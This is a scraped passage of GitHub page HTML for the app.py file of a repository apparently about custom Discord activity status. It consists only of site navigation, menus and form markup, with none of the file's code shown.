<a class="js-selected-navigation-item Header-link d-block d-md-none py-2 py-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:Sponsors" data-hydro-click="{&quot;event_type&quot;:&quot;sponsors.button_click&quot;,&quot;payload&quot;:{&quot;button&quot;:&quot;HEADER_SPONSORS_DASHBOARD&quot;,&quot;sponsorable_login&quot;:&quot;Bomzz06&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="bd1bd75996ab4eff9f5b387e38edf22001205b12681e2842dd057d0e48923133" data-selected-links=" /sponsors/accounts" href="/sponsors/accounts">Sponsors</a> <a class="Header-link d-block d-md-none mr-0 mr-md-3 py-2 py-md-3 border-top border-md-top-0 border-white-fade" href="/settings/profile"> Settings </a> <a class="Header-link d-block d-md-none mr-0 mr-md-3 py-2 py-md-3 border-top border-md-top-0 border-white-fade" href="/Bomzz06"> <img class="avatar avatar-user" loading="lazy" decoding="async" src="https://avatars.githubusercontent.com/u/91737103?s=40&amp;v=4" width="20" height="20" alt="@Bomzz06" /> Bomzz06 </a> <!-- '"` --><!-- </textarea></xmp> --></option></form><form action="/logout" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="7CRAnGj7pqObLLiqjYJPpFQeg2cccpPDh0ctdI4Lqo0Hlukm6FXrZK/EIk1HHF4MURwQnRCShkxzFpTKrvK3qg==" /> <button type="submit" class="Header-link mr-0 mr-md-3 py-2 py-md-3 border-top border-md-top-0 border-white-fade d-md-none btn-link d-block width-full text-left" style="padding-left: 2px;" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;sign out&quot;,&quot;label&quot;:&quot;icon:logout&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="c463a3af349de8e5d9dbb16a9542d05b9d2d051ce270dca9bac1fd9137a14c9a" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-sign-out v-align-middle"> <path fill-rule="evenodd" d="M2 2.75C2 1.784 2.784 1 3.75 1h2.5a.75.75 0 010 1.5h-2.5a.25.25 0 00-.25.25v10.5c0 .138.112.25.25.25h2.5a.75.75 0 010 1.5h-2.5A1.75 1.75 0 012 13.25V2.75zm10.44 4.5H6.75a.75.75 0 000 1.5h5.69l-1.97 1.97a.75.75 0 101.06 1.06l3.25-3.25a.75.75 0 000-1.06l-3.25-3.25a.75.75 0 10-1.06 1.06l1.97 1.97z"></path> </svg> Sign out </button> </form></nav> </div> <div class="Header-item Header-item--full flex-justify-center d-md-none position-relative"> <a class="Header-link " href="https://github.com/" data-hotkey="g d" aria-label="Homepage " data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;go to dashboard&quot;,&quot;label&quot;:&quot;icon:logo&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="4caab5790c0a42a2267601624fa799518e43617bad147991e919699a43f0bf22" > <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github v-align-middle"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path> </svg> </a> </div> <div class="Header-item mr-0 mr-md-3 flex-order-1 flex-md-order-none"> <notification-indicator class="js-socket-channel" data-test-selector="notifications-indicator" data-channel="eyJjIjoibm90aWZpY2F0aW9uLWNoYW5nZWQ6OTE3MzcxMDMiLCJ0IjoxNjMzMzQ2MTgxfQ==--5e54d272a19096ed553a1610cc3407141ef88eed8ceb8bfdd60a0ad8f63d0370"> <a href="/notifications" class="Header-link notification-indicator position-relative tooltipped tooltipped-sw" aria-label="You have no unread notifications" data-hotkey="g n" data-ga-click="Header, go to notifications, icon:read" data-target="notification-indicator.link"> <span class="mail-status " data-target="notification-indicator.modifier"></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path> </svg> </a> </notification-indicator> </div> <div class="Header-item position-relative d-none d-md-flex"> <details class="details-overlay details-reset"> <summary class="Header-link" aria-label="Create new…" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;create new&quot;,&quot;label&quot;:&quot;icon:add&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="5f5a09b269e7a6c9f60268558c0cd09e2184078ca0e24ebb6b686a24fac0dc94" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-plus"> <path fill-rule="evenodd" d="M7.75 2a.75.75 0 01.75.75V7h4.25a.75.75 0 110 1.5H8.5v4.25a.75.75 0 11-1.5 0V8.5H2.75a.75.75 0 010-1.5H7V2.75A.75.75 0 017.75 2z"></path> </svg> <span class="dropdown-caret"></span> </summary> <details-menu class="dropdown-menu dropdown-menu-sw"> <a role="menuitem" class="dropdown-item" href="/new" data-ga-click="Header, create new repository"> New repository </a> <a role="menuitem" class="dropdown-item" href="/new/import" data-ga-click="Header, import a repository"> Import repository </a> <a role="menuitem" class="dropdown-item" href="https://gist.github.com/" data-ga-click="Header, create new gist"> New gist </a> <a role="menuitem" class="dropdown-item" href="/organizations/new" data-ga-click="Header, create new organization"> New organization </a> </details-menu> </details> </div> <div class="Header-item position-relative mr-0 d-none d-md-flex"> <details class="details-overlay details-reset js-feature-preview-indicator-container" data-feature-preview-indicator-src="/users/Bomzz06/feature_preview/indicator_check"> <summary class="Header-link" aria-label="View profile and more" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;show menu&quot;,&quot;label&quot;:&quot;icon:avatar&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="28010ab2db5d0607297200310a6b073105d38e1e90c184d9c408d3e208df889e" > <img src="https://avatars.githubusercontent.com/u/91737103?s=40&amp;v=4" alt="@Bomzz06" size="20" height="20" width="20" data-view-component="true" class="avatar-user avatar avatar-small"></img> <span class="feature-preview-indicator js-feature-preview-indicator" style="top: 1px;" hidden></span> <span class="dropdown-caret"></span> </summary> <details-menu class="dropdown-menu dropdown-menu-sw" style="width: 180px" src="/users/91737103/menu" preload> <include-fragment> <p class="text-center mt-3" data-hide-on-error> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </p> <p class="ml-1 mb-2 mt-2 color-text-primary" data-show-on-error> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> Sorry, something went wrong. </p> </include-fragment> </details-menu> </details> </div> </header> </div> <div id="start-of-content" class="show-on-focus"></div> <div data-pjax-replace id="js-flash-container"> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> <div>{{ message }}</div> </div> </div> </template> </div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container > <div id="repository-container-header" class="hx_page-header-bg pt-3 hide-full-screen mb-5" data-pjax-replace> <div class="d-flex mb-3 px-3 px-md-4 px-lg-5"> <div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <span class="author flex-self-stretch" itemprop="author"> <a class="url fn" rel="author" data-hovercard-type="user" data-hovercard-url="/users/agambajwa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/agambajwa">agambajwa</a> </span> <span class="mx-1 flex-self-stretch color-text-secondary">/</span> <strong itemprop="name" class="mr-2 flex-self-stretch"> <a data-pjax="#js-repo-pjax-container" href="/agambajwa/discord-custom-activity">discord-custom-activity</a> </strong> <span></span><span class="Label Label--secondary v-align-middle mr-1">Public</span> </h1> </div> <ul class="pagehead-actions flex-shrink-0 d-none d-md-inline" style="padding: 2px 0;"> <li> <notifications-list-subscription-form class="f5 position-relative d-flex"> <details class="details-reset details-overlay f5 position-relative" data-target="notifications-list-subscription-form.details" data-action="toggle:notifications-list-subscription-form#detailsToggled" > <summary class="btn btn-sm rounded-right-0" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;WATCH_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0fb560a2317ad347e2cbc363b6cb6c00bf2246de638afe04d1f19de85667d64c" data-ga-click="Repository, click Watch settings, action:blob#show" aria-label="Notifications settings"> <span data-menu-button> <span hidden data-target="notifications-list-subscription-form.unwatchButtonCopy" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-eye"> <path fill-rule="evenodd" d="M1.679 7.932c.412-.621 1.242-1.75 2.366-2.717C5.175 4.242 6.527 3.5 8 3.5c1.473 0 2.824.742 3.955 1.715 1.124.967 1.954 2.096 2.366 2.717a.119.119 0 010 .136c-.412.621-1.242 1.75-2.366 2.717C10.825 11.758 9.473 12.5 8 12.5c-1.473 0-2.824-.742-3.955-1.715C2.92 9.818 2.09 8.69 1.679 8.068a.119.119 0 010-.136zM8 2c-1.981 0-3.67.992-4.933 2.078C1.797 5.169.88 6.423.43 7.1a1.619 1.619 0 000 1.798c.45.678 1.367 1.932 2.637 3.024C4.329 13.008 6.019 14 8 14c1.981 0 3.67-.992 4.933-2.078 1.27-1.091 2.187-2.345 2.637-3.023a1.619 1.619 0 000-1.798c-.45-.678-1.367-1.932-2.637-3.023C11.671 2.992 9.981 2 8 2zm0 8a2 2 0 100-4 2 2 0 000 4z"></path> </svg> Unwatch </span> <span hidden data-target="notifications-list-subscription-form.stopIgnoringButtonCopy" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell-slash"> <path fill-rule="evenodd" d="M8 1.5c-.997 0-1.895.416-2.534 1.086A.75.75 0 014.38 1.55 5 5 0 0113 5v2.373a.75.75 0 01-1.5 0V5A3.5 3.5 0 008 1.5zM4.182 4.31L1.19 2.143a.75.75 0 10-.88 1.214L3 5.305v2.642a.25.25 0 01-.042.139L1.255 10.64A1.518 1.518 0 002.518 13h11.108l1.184.857a.75.75 0 10.88-1.214l-1.375-.996a1.196 1.196 0 00-.013-.01L4.198 4.321a.733.733 0 00-.016-.011zm7.373 7.19L4.5 6.391v1.556c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01.015.015 0 00.005.012.017.017 0 00.006.004l.007.001h9.037zM8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path> </svg> Stop ignoring </span> <span data-target="notifications-list-subscription-form.watchButtonCopy" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-eye"> <path fill-rule="evenodd" d="M1.679 7.932c.412-.621 1.242-1.75 2.366-2.717C5.175 4.242 6.527 3.5 8 3.5c1.473 0 2.824.742 3.955 1.715 1.124.967 1.954 2.096 2.366 2.717a.119.119 0 010 .136c-.412.621-1.242 1.75-2.366 2.717C10.825 11.758 9.473 12.5 8 12.5c-1.473 0-2.824-.742-3.955-1.715C2.92 9.818 2.09 8.69 1.679 8.068a.119.119 0 010-.136zM8 2c-1.981 0-3.67.992-4.933 2.078C1.797 5.169.88 6.423.43 7.1a1.619 1.619 0 000 1.798c.45.678 1.367 1.932 2.637 3.024C4.329 13.008 6.019 14 8 14c1.981 0 3.67-.992 4.933-2.078 1.27-1.091 2.187-2.345 2.637-3.023a1.619 1.619 0 000-1.798c-.45-.678-1.367-1.932-2.637-3.023C11.671 2.992 9.981 2 8 2zm0 8a2 2 0 100-4 2 2 0 000 4z"></path> </svg> Watch </span> </span> <span class="dropdown-caret"></span> </summary> <details-menu class="SelectMenu " role="menu" data-target="notifications-list-subscription-form.menu" > <div class="SelectMenu-modal notifications-component-menu-modal"> <header class="SelectMenu-header"> <h3 class="SelectMenu-title">Notifications</h3> <button class="SelectMenu-closeButton" type="button" aria-label="Close menu" data-action="click:notifications-list-subscription-form#closeMenu"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> </header> <div class="SelectMenu-list"> <form data-target="notifications-list-subscription-form.form" data-action="submit:notifications-list-subscription-form#submitForm" action="/notifications/subscribe" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="3ZqUffXIzoqG5w2XIHAesd3nzNWGsbYI14zeB/aLcycZrWVHDOzMus5mw4ZYgydJy3bl9mjcHNRNkIxbtVYSrA==" autocomplete="off" /> <input type="hidden" name="repository_id" value="298526344"> <button type="submit" name="do" value="included" class="SelectMenu-item flex-items-start" role="menuitemradio" aria-checked="true" data-targets="notifications-list-subscription-form.subscriptionButtons" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="f5 text-bold"> Participating and @mentions </div> <div class="text-small color-text-secondary text-normal pb-1"> Only receive notifications from this repository when participating or @mentioned. </div> </div> </button> <button type="submit" name="do" value="subscribed" class="SelectMenu-item flex-items-start" role="menuitemradio" aria-checked="false" data-targets="notifications-list-subscription-form.subscriptionButtons" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="f5 text-bold"> All Activity </div> <div class="text-small color-text-secondary text-normal pb-1"> Notified of all notifications on this repository. </div> </div> </button> <button type="submit" name="do" value="ignore" class="SelectMenu-item flex-items-start" role="menuitemradio" aria-checked="false" data-targets="notifications-list-subscription-form.subscriptionButtons" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="f5 text-bold"> Ignore </div> <div class="text-small color-text-secondary text-normal pb-1"> Never be notified. </div> </div> </button> </form> <button class="SelectMenu-item flex-items-start pr-3" type="button" role="menuitemradio" data-target="notifications-list-subscription-form.customButton" data-action="click:notifications-list-subscription-form#openCustomDialog" aria-haspopup="true" aria-checked="false" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="d-flex flex-items-start flex-justify-between"> <div class="f5 text-bold">Custom</div> <div class="f5 pr-1"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-arrow-right"> <path fill-rule="evenodd" d="M8.22 2.97a.75.75 0 011.06 0l4.25 4.25a.75.75 0 010 1.06l-4.25 4.25a.75.75 0 01-1.06-1.06l2.97-2.97H3.75a.75.75 0 010-1.5h7.44L8.22 4.03a.75.75 0 010-1.06z"></path> </svg> </div> </div> <div class="text-small color-text-secondary text-normal pb-1"> Select events you want to be notified of in addition to participating and @mentions. </div> </div> </button> <div class="px-3 py-2 d-flex color-bg-secondary flex-items-center"> <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-mobile SelectMenu-icon SelectMenu-icon--device-mobile"> <path fill-rule="evenodd" d="M3.75 0A1.75 1.75 0 002 1.75v12.5c0 .966.784 1.75 1.75 1.75h8.5A1.75 1.75 0 0014 14.25V1.75A1.75 1.75 0 0012.25 0h-8.5zM3.5 1.75a.25.25 0 01.25-.25h8.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25h-8.5a.25.25 0 01-.25-.25V1.75zM8 13a1 1 0 100-2 1 1 0 000 2z"></path> </svg> </span> <span className="text-small color-text-secondary text-normal pb-1"> Get push notifications on <a target="_blank" rel="noopener noreferrer" href="https://apps.apple.com/app/apple-store/id1477376905?ct=watch-dropdown&amp;mt=8&amp;pt=524675">iOS</a> or <a target="_blank" rel="noopener noreferrer" href="https://play.google.com/store/apps/details?id=com.github.android&amp;referrer=utm_campaign%3Dwatch-dropdown%26utm_medium%3Dweb%26utm_source%3Dgithub">Android</a>. </span> </div> </div> </div> </details-menu> <details-dialog class="notifications-component-dialog " data-target="notifications-list-subscription-form.customDialog" hidden> <div class="SelectMenu-modal notifications-component-dialog-modal overflow-visible"> <form data-target="notifications-list-subscription-form.customform" data-action="submit:notifications-list-subscription-form#submitCustomForm" action="/notifications/subscribe" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="B5KeWY/J7AWLIwERLJheXkUJmk2gzdVgu6NQMebrvkjDpW9jdu3uNcOizwBUa2emU5izbk6gf7whvwJtpTbfww==" autocomplete="off" /> <input type="hidden" name="repository_id" value="298526344"> <header class="d-sm-none SelectMenu-header pb-0 border-bottom-0 px-2 px-sm-3"> <h1 class="f3 SelectMenu-title d-inline-flex"> <button class="color-bg-primary border-0 px-2 py-0 m-0 Link--secondary f5" aria-label="Return to menu" type="button" data-action="click:notifications-list-subscription-form#closeCustomDialog" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-arrow-left"> <path fill-rule="evenodd" d="M7.78 12.53a.75.75 0 01-1.06 0L2.47 8.28a.75.75 0 010-1.06l4.25-4.25a.75.75 0 011.06 1.06L4.81 7h7.44a.75.75 0 010 1.5H4.81l2.97 2.97a.75.75 0 010 1.06z"></path> </svg> </button> Custom </h1> </header> <header class="d-none d-sm-flex flex-items-start pt-1"> <button class="border-0 px-2 pt-1 m-0 Link--secondary f5" style="background-color: transparent;" aria-label="Return to menu" type="button" data-action="click:notifications-list-subscription-form#closeCustomDialog" > <svg style="position: relative; left: 2px; top: 1px" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-arrow-left"> <path fill-rule="evenodd" d="M7.78 12.53a.75.75 0 01-1.06 0L2.47 8.28a.75.75 0 010-1.06l4.25-4.25a.75.75 0 011.06 1.06L4.81 7h7.44a.75.75 0 010 1.5H4.81l2.97 2.97a.75.75 0 010 1.06z"></path> </svg> </button> <h1 class="pt-1 pr-4 pb-0 pl-0 f5 text-bold"> Custom </h1> </header> <fieldset> <legend> <div class="text-small color-text-secondary pt-0 pr-3 pb-3 pl-6 pl-sm-5 border-bottom mb-3"> Select events you want to be notified of in addition to participating and @mentions. </div> </legend> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="Issue" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Issues </label> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="PullRequest" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Pull requests </label> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="Release" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Releases </label> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="Discussion" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Discussions </label> <span class="tooltipped tooltipped-nw mr-2 p-1 float-right" aria-label="Discussions are not enabled for this repo"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-info color-icon-secondary"> <path fill-rule="evenodd" d="M8 1.5a6.5 6.5 0 100 13 6.5 6.5 0 000-13zM0 8a8 8 0 1116 0A8 8 0 010 8zm6.5-.25A.75.75 0 017.25 7h1a.75.75 0 01.75.75v2.75h.25a.75.75 0 010 1.5h-2a.75.75 0 010-1.5h.25v-2h-.25a.75.75 0 01-.75-.75zM8 6a1 1 0 100-2 1 1 0 000 2z"></path> </svg> </span> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="SecurityAlert" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Security alerts </label> </div> </fieldset> <div class="pt-2 pb-3 px-3 d-flex flex-justify-start flex-row-reverse"> <button type="submit" name="do" value="custom" class="btn btn-sm btn-primary ml-2" data-target="notifications-list-subscription-form.customSubmit" disabled >Apply</button> <button data-action="click:notifications-list-subscription-form#resetForm" data-close-dialog="" type="button" data-view-component="true" class="btn-sm btn"> Cancel </button> </div> </form> </div> </details-dialog> <div class="notifications-component-dialog-overlay"></div> </details> <a class="social-count" href="/agambajwa/discord-custom-activity/watchers" aria-label="1 user is watching this repository" data-target="notifications-list-subscription-form.socialCount" > 1 </a> </notifications-list-subscription-form> </li> <li> <div class="d-block js-toggler-container js-social-container starring-container "> <form class="starred js-social-form" action="/agambajwa/discord-custom-activity/unstar" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="aDCHwYWaKLqsiSpgtNmgiE7iFJLWTNM0XuVEDy07yVMAH8JGuspOc2NzboCj53rrQUivnEYrO1vElQnYTWLEfA==" autocomplete="off" /> <input type="hidden" name="context" value="repository"> <button type="submit" class="btn btn-sm btn-with-count js-toggler-target" aria-label="Unstar this repository" title="Unstar agambajwa/discord-custom-activity" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;UNSTAR_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="26b99205bc3675fed3a1976bc898e3bc2cf139c2bf84883a16c605f8312c2605" data-ga-click="Repository, click unstar button, action:blob#show; text:Unstar"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star-fill mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25z"></path> </svg> <span data-view-component="true"> Unstar </span></button> <a class="social-count js-social-count" href="/agambajwa/discord-custom-activity/stargazers" aria-label="2 users starred this repository"> 2 </a> </form> <form class="unstarred js-social-form" action="/agambajwa/discord-custom-activity/star" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="WoX2iMic/750KwGaNF8YrDLWLPEQJnCPcPCz4SryCz67Y7zkkhN7pPCZ5FbCK6VDYEedSzBa9QWGpe4R8A4A4g==" autocomplete="off" /> <input type="hidden" name="context" value="repository"> <button type="submit" class="btn btn-sm btn-with-count js-toggler-target" aria-label="Star this repository" title="Star agambajwa/discord-custom-activity" 